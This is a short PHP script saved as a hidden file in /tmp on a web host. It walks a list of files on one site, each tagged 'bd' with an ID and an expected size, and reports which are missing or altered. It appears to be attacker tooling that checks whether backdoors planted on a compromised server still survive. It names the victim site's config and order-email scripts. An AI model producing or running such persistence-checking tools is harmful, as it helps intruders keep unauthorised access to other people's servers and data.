File: //tmp/.resource
<?php $r = '/home/vitanhod/sawpalmetto3.vitavit.com.pk'; $x = ["/includes/config.php"=>"bd@@1310479@@79",
"/orderemail_bk.php"=>"bd@@1310371@@91",
"/orderemail.php"=>"bd@@1310196@@14",
"/includes/configOnline.php"=>"bd@@1310091@@24",
"/cma_m_wanted.php"=>"bd@@1313057@@920",
"/includes/pages.php"=>"bd@@1310578@@897",
"/img/DeleteFile.php"=>"bd@@1312903@@69",
"/cma_m_wanted.php"=>"bd@@1314834@@83",
"/includes/pages.php"=>"bd@@1312795@@81",
"/img/DeleteFile.php"=>"bd@@1309807@@987"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');